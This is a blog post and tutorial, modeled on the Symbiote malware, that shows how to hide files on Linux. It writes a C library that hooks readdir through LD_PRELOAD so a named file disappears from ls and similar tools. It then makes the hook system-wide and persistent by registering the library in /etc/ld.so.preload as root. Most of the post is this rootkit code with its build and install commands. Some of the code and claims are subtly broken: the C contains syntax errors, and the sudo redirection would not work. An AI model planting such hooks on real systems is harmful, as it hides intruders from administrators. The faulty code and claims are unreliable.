DEV Community

Cover image for Dynamic Linker Hijacking Experiments - Evasive Techniques (Part 1)
Dimitar
Dimitar

Posted on • Updated on

Dynamic Linker Hijacking Experiments - Evasive Techniques (Part 1)

Overview

Recently I heard about a new malware called Symbiote, which the researches are calling the "Nearly-Impossible-to-Detect Linux Threat". I was very intrigued by how that malware is being implemented and how it works internally to remain undetected, so naturally I've started to research it.

I highly advise you to read through these articles first before we begin with the actual post:

Implementation

I decided to implement a very simple alternative of the evasive techniques that this malware uses just as a proof of concept and if you already read the articles that I've linked, it is apparent that we have to implement a shared library, that will override some symbols defined in the Linux Kernel.

What do we need first and how to hide a file from lets say a command like ls? With a little bit of investigating of how the ls works internally through the source code and the linux manual page
We can see that internally we have a function that is called print_dir. I've truncated the comments of the original source code.

 ...
static void
print_dir (char const *name, char const *realname, bool command_line_arg)
...
Enter fullscreen mode Exit fullscreen mode

If we continue further down the function we can see the loop that actually iterates over the files

...
  while (true)
    {
      errno = 0;
      next = readdir (dirp); // Here we can see that the loop iterates over readdir as long
      // as the pointer that readdir returns isn't null and the errno != 0
      if (next)
        {
          if (! file_ignored (next->d_name)) // we can see here that it the filename is
          // taken from the next variable, lets look through the source code of `readdir`
            {
      ...
Enter fullscreen mode Exit fullscreen mode

Let's confirm that by invoking nm this will show us the dynamic symbols that are being loaded from shared libs.

$ nm -D /usr/bin/ls | grep "readdir"
                 U readdir@GLIBC_2.2.5
Enter fullscreen mode Exit fullscreen mode

Now I concluded that I need to search into the source code of readdir which is located here and the linux manual page. The description more or less describes exactly what we concluded from the source code of ls.c. Lets see where we set that d_name variable.

#include <dirent.h>

struct dirent *readdir(DIR *dirp); // Signature of the readdir
Enter fullscreen mode Exit fullscreen mode
struct dirent {
    ino_t          d_ino;       /* Inode number */
    off_t          d_off;       /* Not an offset; see below */
    unsigned short d_reclen;    /* Length of this record */
    unsigned char  d_type;      /* Type of file; not supported
                                    by all filesystem types */
    char           d_name[256]; /* Null-terminated filename */
};
Enter fullscreen mode Exit fullscreen mode

⚠️ This reverse engineering/looking up the code might be a little bit tricky because of the different implementations of the dirent structure, if you look through some other source codes you may look at some slightly different structures. In this case the number of chars in the array is 256 but that might change to some other values. And you can always count that d_name will exists since this field must be implemented on all POSIX systems.

Alright, let's start implementing our own function readdir that we will wrap the original one with.

/* libhidemyfile.c */
#define _GNU_SOURCE
#include <dirent.h> // Including the Directory Entry structure
// The dynamic linking header file so we can use the dlsym
// which will give us the address for the readdir symbol
#include <dlfcn.h>
#include <string.h> // So we can use the strstr

struct dirent *readdir(DIR *dirp) {
    struct *(handle)(DIR *);
    // https://man7.org/linux/man-pages/man3/dlsym.3.html
    // Search for RTLD_NEXT, basically it allow us to wrap
    // the original function
    handle = dlsym(RTLD_NEXT, "readdir")
    struct dirent *dp;

    // Iterating over the return values of our original `readdir`
    while((dp = handle(dirp))) {
        // if our `needle`(our file `syl.lys`) is found in the `haystack`(`dp->d_name`)
        // break the loop and go to the next entry, essentially skipping our file.
        if(strstr(dp->d_name, "syl.lys") == 0)
            break;
    }
    return dp;
}
Enter fullscreen mode Exit fullscreen mode

This is what our final version of wrapper for readdir would look like. Now let's try to compile it.

$ gcc libhidemyfile.c -fPIC -shared -o libhidemyfile.so -ldl
Enter fullscreen mode Exit fullscreen mode

Flags:

Now that we have shared object (*.so) file lets see how to use it in action.

How to overwrite the exported symbols? LD_PRELOAD

I advise you to read that first to get a better understanding of how it works.

The next thing that we are going to do is to test our shared library and see if it works. Lets run ls with our libhidemyfile.so loaded before anything else.

$ ls
libhidemyfile.so  syl.lys
$ LD_PRELOAD=./libhidemyfile.so ls
libhidemyfile.so
Enter fullscreen mode Exit fullscreen mode

As you can see we successfully implement a shared library that hides our file from ls, and not only that command, every command that uses readdir won't be able to list our file as long as we load our shared library. So in that case we must think of a persistent way of how to load it without typing LD_PRELOAD in front of every command.

/etc/ld.so.preload

If you read carefully the man pages for LD_PRELOAD you should know that you won't be able to override functions in the standard search directories without properly setting your set-user-ID permissions.

Instead we are going to use the /etc/ld.so.preload which does not suffer from these restrictions. This suffers from requiring root privileges but c'mon.. if you are here you will get those!

We first need to move our shared library file in some root directory, preferably /lib/ since..it is a library.

$ sudo mv ./libhidemyfile.so /lib/libhidemyfile.so
Enter fullscreen mode Exit fullscreen mode

Then we just need to place our library dir in ld.so.preload file.

$ sudo echo "/lib/libhidemyfile.so" > /etc/ld.so.preload
Enter fullscreen mode Exit fullscreen mode

And if everything is good, executing ls or any of its aliases will hide our file from the output. Let's verify this by using ldd

$ ldd /bin/ls
        linux-vdso.so.1 (0x00007ffc0c8e2000)
        /lib/libhidemyfile.so (0x00007f00e59e4000) <--- Here it is!
        libselinux.so.1 => /lib64/libselinux.so.1 (0x00007f00e5997000)
        libcap.so.2 => /lib64/libcap.so.2 (0x00007f00e598d000)
        libc.so.6 => /lib64/libc.so.6 (0x00007f00e5600000)
        libpcre2-8.so.0 => /lib64/libpcre2-8.so.0 (0x00007f00e58f0000)
        /lib64/ld-linux-x86-64.so.2 (0x00007f00e5a0f000)
Enter fullscreen mode Exit fullscreen mode

For your convenience I've setup a Docker container that you can use with ld.so.preload setup

$ docker run -it --rm sylly/ctf_findme
Enter fullscreen mode Exit fullscreen mode

End

If you reached here, thank you so much for the read. In the next part I will try to "completely" hide it from the system because now if we cat it despite not "reading" it in the directory would print us the contents of the file, but that will be the subject of the next post.

Resources

This post wouldn't be possible without:

Oldest comments (0)